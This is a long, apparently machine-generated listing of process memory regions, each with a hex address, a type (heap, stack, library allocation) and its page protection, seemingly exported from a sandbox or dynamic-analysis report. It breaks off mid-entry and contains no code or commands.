18679E70000
|
heap
|
page execute and read and write
|
||
2A71F901000
|
heap
|
page read and write
|
||
7FFD34500000
|
trusted library allocation
|
page read and write
|
||
7FFD34470000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34460000
|
trusted library allocation
|
page execute and read and write
|
||
2A705381000
|
heap
|
page read and write
|
||
7FFD344E0000
|
trusted library allocation
|
page read and write
|
||
7FFD345A0000
|
trusted library allocation
|
page read and write
|
||
2A71F92D000
|
heap
|
page read and write
|
||
23A1A0D2000
|
heap
|
page read and write
|
||
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
AC78C7E000
|
stack
|
page read and write
|
||
200902F9000
|
trusted library allocation
|
page read and write
|
||
7FFD343D0000
|
trusted library allocation
|
page execute and read and write
|
||
76F497E000
|
stack
|
page read and write
|
||
18601032000
|
trusted library allocation
|
page read and write
|
||
2A70537D000
|
heap
|
page read and write
|
||
7FFD346A2000
|
trusted library allocation
|
page read and write
|
||
CC6707E000
|
stack
|
page read and write
|
||
AC78F79000
|
stack
|
page read and write
|
||
1860130B000
|
trusted library allocation
|
page read and write
|
||
2A716FB1000
|
trusted library allocation
|
page read and write
|
||
1435000
|
heap
|
page read and write
|
||
7FFD34470000
|
trusted library allocation
|
page execute and read and write
|
||
3073000
|
trusted library allocation
|
page read and write
|
||
7FFD343A6000
|
trusted library allocation
|
page execute and read and write
|
||
1B67E000
|
stack
|
page read and write
|
||
1C8BA000
|
stack
|
page read and write
|
||
23A02692000
|
trusted library allocation
|
page read and write
|
||
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
7FFD34360000
|
trusted library allocation
|
page read and write
|
||
7FFD343A6000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD346E0000
|
trusted library allocation
|
page read and write
|
||
7FFD34494000
|
trusted library allocation
|
page read and write
|
||
7FFD34462000
|
trusted library allocation
|
page read and write
|
||
1C028000
|
heap
|
page read and write
|
||
456A89000
|
stack
|
page read and write
|
||
7FFD344D0000
|
trusted library allocation
|
page read and write
|
||
7FFD343A0000
|
trusted library allocation
|
page execute and read and write
|
||
CF0000
|
unkown
|
page readonly
|
||
186102EA000
|
trusted library allocation
|
page read and write
|
||
7FFD344D0000
|
trusted library allocation
|
page read and write
|
||
2A7082B3000
|
trusted library allocation
|
page read and write
|
||
7FFD3433C000
|
trusted library allocation
|
page execute and read and write
|
||
4559FE000
|
stack
|
page read and write
|
||
20081036000
|
trusted library allocation
|
page read and write
|
||
7FFD34640000
|
trusted library allocation
|
page read and write
|
||
2A71F4A6000
|
heap
|
page read and write
|
||
7FFD34615000
|
trusted library allocation
|
page read and write
|
||
2A70539B000
|
heap
|
page read and write
|
||
7FFD34570000
|
trusted library allocation
|
page read and write
|
||
2A705389000
|
heap
|
page read and write
|
||
200F0580000
|
heap
|
page read and write
|
||
121C000
|
heap
|
page read and write
|
||
7FFD34510000
|
trusted library allocation
|
page read and write
|
||
7FFD34482000
|
trusted library allocation
|
page read and write
|
||
23A02F49000
|
trusted library allocation
|
page read and write
|
||
7FFD346BE000
|
trusted library allocation
|
page read and write
|
||
CC66F78000
|
stack
|
page read and write
|
||
DC0000
|
heap
|
page read and write
|
||
7FFD34480000
|
trusted library allocation
|
page read and write
|
||
1B3AF000
|
heap
|
page read and write
|
||
7FFD34520000
|
trusted library allocation
|
page read and write
|
||
13049000
|
trusted library allocation
|
page read and write
|
||
18677F00000
|
heap
|
page read and write
|
||
7FFD34490000
|
trusted library allocation
|
page execute and read and write
|
||
AC79CCF000
|
stack
|
page read and write
|
||
1207000
|
heap
|
page read and write
|
||
2A71F4C8000
|
heap
|
page read and write
|
||
7FFD34590000
|
trusted library allocation
|
page read and write
|
||
23A01B60000
|
heap
|
page read and write
|
||
F05000
|
heap
|
page read and write
|
||
7FFD34491000
|
trusted library allocation
|
page read and write
|
||
E96000
|
heap
|
page read and write
|
||
CC668A3000
|
stack
|
page read and write
|
||
D05000
|
unkown
|
page readonly
|
||
20080C11000
|
trusted library allocation
|
page read and write
|
||
7FFD346E0000
|
trusted library allocation
|
page read and write
|
||
76F5A4C000
|
stack
|
page read and write
|
||
23A1A4B1000
|
heap
|
page read and write
|
||
200F22F0000
|
heap
|
page read and write
|
||
2A71729A000
|
trusted library allocation
|
page read and write
|
||
7FFD342D0000
|
trusted library allocation
|
page read and write
|
||
D13000
|
unkown
|
page readonly
|
||
7FFD342FD000
|
trusted library allocation
|
page execute and read and write
|
||
455BBE000
|
stack
|
page read and write
|
||
7FFD3471D000
|
trusted library allocation
|
page read and write
|
||
200F0560000
|
trusted library allocation
|
page read and write
|
||
AC78D79000
|
stack
|
page read and write
|
||
7FFD342DB000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD342C0000
|
trusted library allocation
|
page read and write
|
||
18677F30000
|
trusted library section
|
page read and write
|
||
200F03D9000
|
heap
|
page read and write
|
||
18677D39000
|
heap
|
page read and write
|
||
186798E1000
|
heap
|
page read and write
|
||
7FFD346AC000
|
trusted library allocation
|
page read and write
|
||
7FFD34610000
|
trusted library allocation
|
page read and write
|
||
18610070000
|
trusted library allocation
|
page read and write
|
||
20080F74000
|
trusted library allocation
|
page read and write
|
||
7FFD34452000
|
trusted library allocation
|
page read and write
|
||
7FFD342C4000
|
trusted library allocation
|
page read and write
|
||
18677CD0000
|
heap
|
page read and write
|
||
7FFD3433C000
|
trusted library allocation
|
page execute and read and write
|
||
23A11F31000
|
trusted library allocation
|
page read and write
|
||
CC67E4E000
|
stack
|
page read and write
|
||
7FFD344B0000
|
trusted library allocation
|
page read and write
|
||
76F4C76000
|
stack
|
page read and write
|
||
200F02E0000
|
heap
|
page read and write
|
||
2A707F18000
|
trusted library allocation
|
page read and write
|
||
2A708251000
|
trusted library allocation
|
page read and write
|
||
76F4AF9000
|
stack
|
page read and write
|
||
7FFD34580000
|
trusted library allocation
|
page read and write
|
||
7FFD343C6000
|
trusted library allocation
|
page execute and read and write
|
||
1861049C000
|
trusted library allocation
|
page read and write
|
||
23A1A4BD000
|
heap
|
page read and write
|
||
1867A1CD000
|
heap
|
page read and write
|
||
23A0016A000
|
heap
|
page read and write
|
||
7FFD342CB000
|
trusted library allocation
|
page read and write
|
||
CC6692E000
|
stack
|
page read and write
|
||
1265000
|
heap
|
page read and write
|
||
AC78CFE000
|
stack
|
page read and write
|
||
F61000
|
heap
|
page read and write
|
||
23A1A118000
|
heap
|
page read and write
|
||
7FFD34614000
|
trusted library allocation
|
page read and write
|
||
18677D30000
|
heap
|
page read and write
|
||
2D00000
|
heap
|
page execute and read and write
|
||
18601124000
|
trusted library allocation
|
page read and write
|
||
200F2344000
|
heap
|
page read and write
|
||
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
CC670FE000
|
stack
|
page read and write
|
||
23A01AE0000
|
heap
|
page readonly
|
||
45690E000
|
stack
|
page read and write
|
||
23A1A1D0000
|
heap
|
page execute and read and write
|
||
7FFD342B3000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD342C4000
|
trusted library allocation
|
page read and write
|
||
306F000
|
trusted library allocation
|
page read and write
|
||
23A00164000
|
heap
|
page read and write
|
||
AC78DFE000
|
stack
|
page read and write
|
||
7FFD344C0000
|
trusted library allocation
|
page read and write
|
||
7FFD34560000
|
trusted library allocation
|
page read and write
|
||
7FFD342D4000
|
trusted library allocation
|
page read and write
|
||
7FFD34610000
|
trusted library allocation
|
page read and write
|
||
2A71F811000
|
heap
|
page read and write
|
||
23A01BA0000
|
trusted library allocation
|
page read and write
|
||
76F4B7D000
|
stack
|
page read and write
|
||
7FFD34570000
|
trusted library allocation
|
page read and write
|
||
7FFD342F0000
|
trusted library allocation
|
page read and write
|
||
7FFD346CC000
|
trusted library allocation
|
page read and write
|
||
1867A1D1000
|
heap
|
page read and write
|
||
76F4E7E000
|
stack
|
page read and write
|
||
186102F8000
|
trusted library allocation
|
page read and write
|
||
23A001AA000
|
heap
|
page read and write
|
||
7FFD342B2000
|
trusted library allocation
|
page read and write
|
||
7FFD344E0000
|
trusted library allocation
|
page read and write
|
||
7DF4A7500000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD346BC000
|
trusted library allocation
|
page read and write
|
||
7FFD344A0000
|
trusted library allocation
|
page execute and read and write
|
||
1490000
|
heap
|
page read and write
|
||
2A7080CE000
|
trusted library allocation
|
page read and write
|
||
2A71F938000
|
heap
|
page read and write
|
||
2A71F872000
|
heap
|
page read and write
|
||
7FFD34461000
|
trusted library allocation
|
page read and write
|
||
7FFD343D0000
|
trusted library allocation
|
page execute and read and write
|
||
2A707BB3000
|
trusted library allocation
|
page read and write
|
||
ED1000
|
heap
|
page read and write
|
||
18600BFF000
|
trusted library allocation
|
page read and write
|
||
7FFD344A0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34540000
|
trusted library allocation
|
page read and write
|
||
200F0510000
|
trusted library allocation
|
page read and write
|
||
15F0000
|
heap
|
page read and write
|
||
23A02BDD000
|
trusted library allocation
|
page read and write
|
||
2A70890A000
|
trusted library allocation
|
page read and write
|
||
18677F60000
|
trusted library allocation
|
page read and write
|
||
AC790FF000
|
stack
|
page read and write
|
||
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
2E4F000
|
trusted library allocation
|
page read and write
|
||
23A11E49000
|
trusted library allocation
|
page read and write
|
||
7FFD34498000
|
trusted library allocation
|
page read and write
|
||
AC78913000
|
stack
|
page read and write
|
||
23A000F0000
|
heap
|
page read and write
|
||
7FFD346B0000
|
trusted library allocation
|
page read and write
|
||
23A0358D000
|
trusted library allocation
|
page read and write
|
||
2A706FA0000
|
heap
|
page execute and read and write
|
||
23A1A123000
|
heap
|
page read and write
|
||
18677CF0000
|
heap
|
page read and write
|
||
F51000
|
heap
|
page read and write
|
||
455DBF000
|
stack
|
page read and write
|
||
18677F80000
|
trusted library allocation
|
page read and write
|
||
18679880000
|
heap
|
page execute and read and write
|
||
1CA1E000
|
stack
|
page read and write
|
||
1B9D0000
|
heap
|
page execute and read and write
|
||
1B80F000
|
stack
|
page read and write
|
||
200F0570000
|
heap
|
page execute and read and write
|
||
7FFD34620000
|
trusted library allocation
|
page read and write
|
||
200F275E000
|
heap
|
page read and write
|
||
7FFD344C0000
|
trusted library allocation
|
page read and write
|
||
7DF401EE0000
|
trusted library allocation
|
page execute and read and write
|
||
2A71F7F9000
|
heap
|
page read and write
|
||
2A707F14000
|
trusted library allocation
|
page read and write
|
||
7FFD34492000
|
trusted library allocation
|
page read and write
|
||
E50000
|
heap
|
page read and write
|
||
76F4583000
|
stack
|
page read and write
|
||
20080D7C000
|
trusted library allocation
|
page read and write
|
||
7FFD344C0000
|
trusted library allocation
|
page read and write
|
||
CC6717F000
|
stack
|
page read and write
|
||
7FFD345B0000
|
trusted library allocation
|
page read and write
|
||
7FFD342FB000
|
trusted library allocation
|
page read and write
|
||
1B90E000
|
stack
|
page read and write
|
||
23A1A3B3000
|
heap
|
page read and write
|
||
7FFD344F0000
|
trusted library allocation
|
page read and write
|
||
AC78E77000
|
stack
|
page read and write
|
||
200F0500000
|
trusted library section
|
page read and write
|
||
2A71F7B5000
|
heap
|
page read and write
|
||
1303C000
|
trusted library allocation
|
page read and write
|
||
23A1A4DD000
|
heap
|
page read and write
|
||
7FFD342E0000
|
trusted library allocation
|
page read and write
|
||
7FFD34452000
|
trusted library allocation
|
page read and write
|
||
2A706D20000
|
heap
|
page readonly
|
||
7FFD342D0000
|
trusted library allocation
|
page read and write
|
||
1BFBC000
|
heap
|
page read and write
|
||
18677CC0000
|
heap
|
page read and write
|
||
2A71F43F000
|
heap
|
page read and write
|
||
7FFD345D0000
|
trusted library allocation
|
page read and write
|
||
200F1EAA000
|
heap
|
page read and write
|
||
2A71F5DA000
|
heap
|
page read and write
|
||
1BF80000
|
heap
|
page read and write
|
||
BE0000
|
heap
|
page read and write
|
||
1225000
|
heap
|
page read and write
|
||
23A11F49000
|
trusted library allocation
|
page read and write
|
||
2A716FC0000
|
trusted library allocation
|
page read and write
|
||
7FFD342C0000
|
trusted library allocation
|
page read and write
|
||
18679FA9000
|
heap
|
page read and write
|
||
2A707FE4000
|
trusted library allocation
|
page read and write
|
||
455AFD000
|
stack
|
page read and write
|
||
AC791F8000
|
stack
|
page read and write
|
||
7FFD34480000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
7FFD34540000
|
trusted library allocation
|
page read and write
|
||
20081E28000
|
trusted library allocation
|
page read and write
|
||
23A1A3AF000
|
heap
|
page read and write
|
||
7DF46B2B0000
|
trusted library allocation
|
page execute and read and write
|
||
1C17C000
|
stack
|
page read and write
|
||
7FFD3437C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34612000
|
trusted library allocation
|
page read and write
|
||
23A1A387000
|
heap
|
page read and write
|
||
7FFD342BD000
|
trusted library allocation
|
page execute and read and write
|
||
18601E20000
|
trusted library allocation
|
page read and write
|
||
DD0000
|
heap
|
page read and write
|
||
3021000
|
trusted library allocation
|
page read and write
|
||
2A706D60000
|
trusted library allocation
|
page read and write
|
||
2A71F8B0000
|
heap
|
page read and write
|
||
12E43000
|
trusted library allocation
|
page read and write
|
||
200F2397000
|
heap
|
page read and write
|
||
7FFD34300000
|
trusted library allocation
|
page read and write
|
||
23A1A3AB000
|
heap
|
page read and write
|
||
CC671FE000
|
stack
|
page read and write
|
||
CC6727B000
|
stack
|
page read and write
|
||
7FFD34560000
|
trusted library allocation
|
page read and write
|
||
7FFD34600000
|
trusted library allocation
|
page read and write
|
||
1C9B8000
|
stack
|
page read and write
|
||
1867A080000
|
heap
|
page read and write
|
||
7FFD3439C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34460000
|
trusted library allocation
|
page read and write
|
||
2C50000
|
heap
|
page execute and read and write
|
||
23A02D2F000
|
trusted library allocation
|
page read and write
|
||
7FFD345C0000
|
trusted library allocation
|
page read and write
|
||
11F6000
|
heap
|
page read and write
|
||
2A705352000
|
heap
|
page read and write
|
||
20081309000
|
trusted library allocation
|
page read and write
|
||
23A1A1B0000
|
heap
|
page execute and read and write
|
||
23A1A270000
|
heap
|
page read and write
|
||
2A7053C2000
|
heap
|
page read and write
|
||
7FFD34622000
|
trusted library allocation
|
page read and write
|
||
18601DDB000
|
trusted library allocation
|
page read and write
|
||
23A11C61000
|
trusted library allocation
|
page read and write
|
||
20090031000
|
trusted library allocation
|
page read and write
|
||
7FFD34570000
|
trusted library allocation
|
page read and write
|
||
E9C000
|
heap
|
page read and write
|
||
20081E03000
|
trusted library allocation
|
page read and write
|
||
7FFD34550000
|
trusted library allocation
|
page read and write
|
||
7FFD346D0000
|
trusted library allocation
|
page read and write
|
||
76F5BCB000
|
stack
|
page read and write
|
||
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
1860188D000
|
trusted library allocation
|
page read and write
|
||
45698C000
|
stack
|
page read and write
|
||
7FFD34390000
|
trusted library allocation
|
page read and write
|
||
23A1A426000
|
heap
|
page read and write
|
||
2A71F44E000
|
heap
|
page read and write
|
||
23A1A284000
|
heap
|
page read and write
|
||
1BFB9000
|
heap
|
page read and write
|
||
1860133E000
|
trusted library allocation
|
page read and write
|
||
7FFD342F4000
|
trusted library allocation
|
page read and write
|
||
7FFD342B3000
|
trusted library allocation
|
page execute and read and write
|
||
11D0000
|
heap
|
page read and write
|
||
2A708166000
|
trusted library allocation
|
page read and write
|
||
7FFD34590000
|
trusted library allocation
|
page read and write
|
||
7FFD34500000
|
trusted library allocation
|
page read and write
|
||
7FFD34550000
|
trusted library allocation
|
page read and write
|
||
18677F70000
|
heap
|
page readonly
|
||
1CF6A000
|
stack
|
page read and write
|
||
7FFD34396000
|
trusted library allocation
|
page read and write
|
||
7FFD345D0000
|
trusted library allocation
|
page read and write
|
||
7FFD34590000
|
trusted library allocation
|
page read and write
|
||
15F5000
|
heap
|
page read and write
|
||
ED8000
|
heap
|
page read and write
|
||
7FFD34618000
|
trusted library allocation
|
page read and write
|
||
10F4000
|
stack
|
page read and write
|
||
18610021000
|
trusted library allocation
|
page read and write
|
||
EBD000
|
heap
|
page read and write
|
||
7FFD34609000
|
trusted library allocation
|
page read and write
|
||
7FFD344B0000
|
trusted library allocation
|
page execute and read and write
|
||
186798D5000
|
heap
|
page read and write
|
||
7FFD3430C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34570000
|
trusted library allocation
|
page read and write
|
||
7FFD34550000
|
trusted library allocation
|
page read and write
|
||
7FFD34620000
|
trusted library allocation
|
page read and write
|
||
18678015000
|
heap
|
page read and write
|
||
7FFD34670000
|
trusted library allocation
|
page read and write
|
||
DD0000
|
heap
|
page read and write
|
||
200F04F0000
|
trusted library section
|
page read and write
|
||
2008022A000
|
trusted library allocation
|
page read and write
|
||
18600C71000
|
trusted library allocation
|
page read and write
|
||
1BD7E000
|
stack
|
page read and write
|
||
18610001000
|
trusted library allocation
|
page read and write
|
||
7FFD3461A000
|
trusted library allocation
|
page read and write
|
||
23A03004000
|
trusted library allocation
|
page read and write
|
||
7FFD34510000
|
trusted library allocation
|
page read and write
|
||
AC7899F000
|
stack
|
page read and write
|
||
1450000
|
trusted library allocation
|
page read and write
|
||
7FFD342E2000
|
trusted library allocation
|
page read and write
|
||
23A02EE7000
|
trusted library allocation
|
page read and write
|
||
7FFD343E0000
|
trusted library allocation
|
page execute and read and write
|
||
23A00490000
|
trusted library allocation
|
page read and write
|
||
23A01C35000
|
heap
|
page read and write
|
||
18610011000
|
trusted library allocation
|
page read and write
|
||
7FFD345E0000
|
trusted library allocation
|
page read and write
|
||
18600001000
|
trusted library allocation
|
page read and write
|
||
7FFD34492000
|
trusted library allocation
|
page read and write
|
||
7FFD34360000
|
trusted library allocation
|
page read and write
|
||
7FFD342CD000
|
trusted library allocation
|
page execute and read and write
|
||
2A707BBD000
|
trusted library allocation
|
page read and write
|
||
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
23A1A15A000
|
heap
|
page read and write
|
||
76F49F9000
|
stack
|
page read and write
|
||
2A707F25000
|
trusted library allocation
|
page read and write
|
||
7FFD342E3000
|
trusted library allocation
|
page execute and read and write
|
||
2A705340000
|
heap
|
page read and write
|
||
2A707A02000
|
trusted library allocation
|
page read and write
|
||
7FFD3464C000
|
trusted library allocation
|
page read and write
|
||
7FFD344D0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34360000
|
trusted library allocation
|
page read and write
|
||
7DF401F00000
|
trusted library allocation
|
page execute and read and write
|
||
23A1A400000
|
heap
|
page read and write
|
||
23A01CC6000
|
trusted library allocation
|
page read and write
|
||
7FFD34396000
|
trusted library allocation
|
page execute and read and write
|
||
1860194F000
|
trusted library allocation
|
page read and write
|
||
1B87E000
|
stack
|
page read and write
|
||
1170000
|
heap
|
page read and write
|
||
186797F0000
|
trusted library allocation
|
page read and write
|
||
7FFD345A0000
|
trusted library allocation
|
page read and write
|
||
7FFD345F0000
|
trusted library allocation
|
page read and write
|
||
7FFD34560000
|
trusted library allocation
|
page read and write
|
||
76F4BF7000
|
stack
|
page read and write
|
||
7FFD342C0000
|
trusted library allocation
|
page read and write
|
||
7FFD342C3000
|
trusted library allocation
|
page read and write
|
||
7FFD3430C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD345E0000
|
trusted library allocation
|
page read and write
|
||
7FFD34471000
|
trusted library allocation
|
page read and write
|
||
2A71729F000
|
trusted library allocation
|
page read and write
|
||
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
20080F6F000
|
trusted library allocation
|
page read and write
|
||
1D070000
|
heap
|
page read and write
|
||
18600FCD000
|
trusted library allocation
|
page read and write
|
||
23A1A4F7000
|
heap
|
page read and write
|
||
186011DC000
|
trusted library allocation
|
page read and write
|
||
455979000
|
stack
|
page read and write
|
||
76F45CE000
|
stack
|
page read and write
|
||
145F000
|
stack
|
page read and write
|
||
7FFD345E3000
|
trusted library allocation
|
page read and write
|
||
7FFD344A2000
|
trusted library allocation
|
page read and write
|
||
7FFD3461C000
|
trusted library allocation
|
page read and write
|
||
23A11F2F000
|
trusted library allocation
|
page read and write
|
||
1BB0E000
|
stack
|
page read and write
|
||
1867A180000
|
heap
|
page read and write
|
||
2A71F7E9000
|
heap
|
page read and write
|
||
7FFD34510000
|
trusted library allocation
|
page read and write
|
||
20081065000
|
trusted library allocation
|
page read and write
|
||
AC79ECD000
|
stack
|
page read and write
|
||
200F2325000
|
heap
|
page read and write
|
||
18600A52000
|
trusted library allocation
|
page read and write
|
||
7FFD34609000
|
trusted library allocation
|
page read and write
|
||
7FFD344B0000
|
trusted library allocation
|
page execute and read and write
|
||
23A03A5F000
|
trusted library allocation
|
page read and write
|
||
2A71EFBF000
|
heap
|
page read and write
|
||
1867A1FA000
|
heap
|
page read and write
|
||
2FEF000
|
stack
|
page read and write
|
||
20081DDE000
|
trusted library allocation
|
page read and write
|
||
7FFD345E0000
|
trusted library allocation
|
page read and write
|
||
200F02F2000
|
heap
|
page read and write
|
||
2E3E000
|
stack
|
page read and write
|
||
7FFD34630000
|
trusted library allocation
|
page read and write
|
||
76F4DFE000
|
stack
|
page read and write
|
||
7FFD34650000
|
trusted library allocation
|
page read and write
|
||
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
7FFD3446A000
|
trusted library allocation
|
page read and write
|
||
18601006000
|
trusted library allocation
|
page read and write
|
||
2A71F833000
|
heap
|
page read and write
|
||
23A11C50000
|
trusted library allocation
|
page read and write
|
||
1495000
|
heap
|
page read and write
|
||
7FFD34628000
|
trusted library allocation
|
page read and write
|
||
7FFD34604000
|
trusted library allocation
|
page read and write
|
||
76F5B4C000
|
stack
|
page read and write
|
||
23A03A1A000
|
trusted library allocation
|
page read and write
|
||
18679A30000
|
heap
|
page read and write
|
||
7DF46B2C0000
|
trusted library allocation
|
page execute and read and write
|
||
18679E60000
|
heap
|
page read and write
|
||
20081123000
|
trusted library allocation
|
page read and write
|
||
2A71F5E3000
|
heap
|
page read and write
|
||
1B570000
|
heap
|
page read and write
|
||
7FFD34634000
|
trusted library allocation
|
page read and write
|
||
2A706E70000
|
heap
|
page execute and read and write
|
||
7FFD34619000
|
trusted library allocation
|
page read and write
|
||
7FFD342E4000
|
trusted library allocation
|
page read and write
|
||
7FFD345D0000
|
trusted library allocation
|
page read and write
|
||
7FFD34462000
|
trusted library allocation
|
page read and write
|
||
23A1A49C000
|
heap
|
page read and write
|
||
7FFD345BF000
|
trusted library allocation
|
page read and write
|
||
20081952000
|
trusted library allocation
|
page read and write
|
||
18677D71000
|
heap
|
page read and write
|
||
2A7052C0000
|
heap
|
page read and write
|
||
CC669AE000
|
stack
|
page read and write
|
||
1180000
|
heap
|
page execute and read and write
|
||
186797C0000
|
trusted library allocation
|
page read and write
|
||
18677DB5000
|
heap
|
page read and write
|
||
7FFD346E0000
|
trusted library allocation
|
page execute and read and write
|
||
2A71F91C000
|
heap
|
page read and write
|
||
18678010000
|
heap
|
page read and write
|
||
2A71F5B0000
|
heap
|
page read and write
|
||
E90000
|
heap
|
page read and write
|
||
20080F7C000
|
trusted library allocation
|
page read and write
|
||
1355000
|
heap
|
page read and write
|
||
7FFD346D3000
|
trusted library allocation
|
page read and write
|
||
7FFD34366000
|
trusted library allocation
|
page read and write
|
||
7FFD34580000
|
trusted library allocation
|
page read and write
|
||
2A707F36000
|
trusted library allocation
|
page read and write
|
||
12CC000
|
heap
|
page read and write
|
||
7FFD345B0000
|
trusted library allocation
|
page read and write
|
||
23A01C30000
|
heap
|
page read and write
|
||
1C7BF000
|
stack
|
page read and write
|
||
7FFD34400000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34630000
|
trusted library allocation
|
page read and write
|
||
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
F00000
|
heap
|
page read and write
|
||
200804CD000
|
trusted library allocation
|
page read and write
|
||
2A707F57000
|
trusted library allocation
|
page read and write
|
||
7FFD34300000
|
trusted library allocation
|
page read and write
|
||
7FFD342CD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD345F3000
|
trusted library allocation
|
page read and write
|
||
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
1148000
|
heap
|
page read and write
|
||
2A708840000
|
trusted library allocation
|
page read and write
|
||
23A01AF0000
|
trusted library allocation
|
page read and write
|
||
7FFD3446A000
|
trusted library allocation
|
page read and write
|
||
455563000
|
stack
|
page read and write
|
||
23A1A4EB000
|
heap
|
page read and write
|
||
1B050000
|
trusted library allocation
|
page read and write
|
||
CC66DF7000
|
stack
|
page read and write
|
||
23A1A366000
|
heap
|
page read and write
|
||
2A71F7A4000
|
heap
|
page read and write
|
||
7FFD34510000
|
trusted library allocation
|
page read and write
|
||
23A19C48000
|
heap
|
page read and write
|
||
23A1A3E9000
|
heap
|
page read and write
|
||
200F267B000
|
heap
|
page read and write
|
||
23A1A114000
|
heap
|
page read and write
|
||
AC79DCE000
|
stack
|
page read and write
|
||
200F2687000
|
heap
|
page read and write
|
||
7FFD34630000
|
trusted library allocation
|
page read and write
|
||
1220000
|
heap
|
page read and write
|
||
200902EF000
|
trusted library allocation
|
page read and write
|
||
200F2795000
|
heap
|
page read and write
|
||
23A1A1D6000
|
heap
|
page execute and read and write
|
||
7FFD342BD000
|
trusted library allocation
|
page execute and read and write
|
||
23A02E8F000
|
trusted library allocation
|
page read and write
|
||
18677DB8000
|
heap
|
page read and write
|
||
455EBE000
|
stack
|
page read and write
|
||
2BCF000
|
stack
|
page read and write
|
||
23A029B2000
|
trusted library allocation
|
page read and write
|
||
23A02BD7000
|
trusted library allocation
|
page read and write
|
||
2A707E40000
|
trusted library allocation
|
page read and write
|
||
7FFD344B0000
|
trusted library allocation
|
page read and write
|
||
2A707F1C000
|
trusted library allocation
|
page read and write
|
||
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
12BD8000
|
trusted library allocation
|
page read and write
|
||
AC7917E000
|
stack
|
page read and write
|
||
200F03D6000
|
heap
|
page read and write
|
||
ED4000
|
heap
|
page read and write
|
||
AC79E49000
|
stack
|
page read and write
|
||
23A004C5000
|
heap
|
page read and write
|
||
7FFD34520000
|
trusted library allocation
|
page read and write
|
||
F66000
|
heap
|
page read and write
|
||
1867A108000
|
heap
|
page read and write
|
||
2A706CB0000
|
heap
|
page read and write
|
||
7FFD34618000
|
trusted library allocation
|
page read and write
|
||
18679F63000
|
heap
|
page read and write
|
||
1440000
|
trusted library allocation
|
page read and write
|
||
1B15D000
|
stack
|
page read and write
|
||
200811DB000
|
trusted library allocation
|
page read and write
|
||
1B3CD000
|
stack
|
page read and write
|
||
2A706CF0000
|
trusted library allocation
|
page read and write
|
||
23A02C72000
|
trusted library allocation
|
page read and write
|
||
7FFD34600000
|
trusted library allocation
|
page read and write
|
||
23A1A3C3000
|
heap
|
page read and write
|
||
2A71F5E0000
|
heap
|
page read and write
|
||
20080088000
|
trusted library allocation
|
page read and write
|
||
23A0210D000
|
trusted library allocation
|
page read and write
|
||
200F0530000
|
trusted library allocation
|
page read and write
|
||
7FFD342B0000
|
trusted library allocation
|
page read and write
|
||
455F3B000
|
stack
|
page read and write
|
||
117A000
|
heap
|
page read and write
|
||
B64000
|
stack
|
page read and write
|
||
76F487E000
|
stack
|
page read and write
|
||
15AE000
|
stack
|
page read and write
|
||
2A71F855000
|
heap
|
page read and write
|
||
7FFD345A0000
|
trusted library allocation
|
page read and write
|
||
1410000
|
trusted library allocation
|
page read and write
|
||
200F0327000
|
heap
|
page read and write
|
||
7FFD34396000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34650000
|
trusted library allocation
|
page read and write
|
||
7FFD344A4000
|
trusted library allocation
|
page read and write
|
||
7FFD34620000
|
trusted library allocation
|
page read and write
|
||
20080F67000
|
trusted library allocation
|
page read and write
|
||
455D3A000
|
stack
|
page read and write
|
||
2A70702C000
|
trusted library allocation
|
page read and write
|
||
18679FC7000
|
heap
|
page read and write
|
||
7FFD345E3000
|
trusted library allocation
|
page read and write
|
||
455B79000
|
stack
|
page read and write
|
||
11A5000
|
heap
|
page read and write
|
||
18677F40000
|
trusted library allocation
|
page read and write
|
||
7FFD342B4000
|
trusted library allocation
|
page read and write
|
||
7FFD34640000
|
trusted library allocation
|
page read and write
|
||
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
AC7907A000
|
stack
|
page read and write
|
||
18679EF3000
|
heap
|
page read and write
|
||
200810C0000
|
trusted library allocation
|
page read and write
|
||
200F279B000
|
heap
|
page read and write
|
||
115E000
|
stack
|
page read and write
|
||
CC66CFA000
|
stack
|
page read and write
|
||
23A00090000
|
heap
|
page read and write
|
||
23A1A3B7000
|
heap
|
page read and write
|
||
2A706FB1000
|
trusted library allocation
|
page read and write
|
||
2A708DD8000
|
trusted library allocation
|
page read and write
|
||
2A705310000
|
heap
|
page read and write
|
||
7FFD343E0000
|
trusted library allocation
|
page execute and read and write
|
||
1100000
|
heap
|
page read and write
|
||
455CB8000
|
stack
|
page read and write
|
||
2A7172B9000
|
trusted library allocation
|
page read and write
|
||
7FFD342ED000
|
trusted library allocation
|
page execute and read and write
|
||
13EE000
|
stack
|
page read and write
|
||
7FFD34612000
|
trusted library allocation
|
page read and write
|
||
1BE7E000
|
stack
|
page read and write
|
||
23A1A580000
|
trusted library allocation
|
page read and write
|
||
7FFD346D0000
|
trusted library allocation
|
page execute and read and write
|
||
23A0015E000
|
heap
|
page read and write
|
||
1232000
|
heap
|
page read and write
|
||
7FFD342ED000
|
trusted library allocation
|
page execute and read and write
|
||
2C10000
|
trusted library allocation
|
page read and write
|
||
E00000
|
heap
|
page read and write
|
||
7FFD344C2000
|
trusted library allocation
|
page read and write
|
||
7FFD3436C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34520000
|
trusted library allocation
|
page read and write
|
||
200F02C0000
|
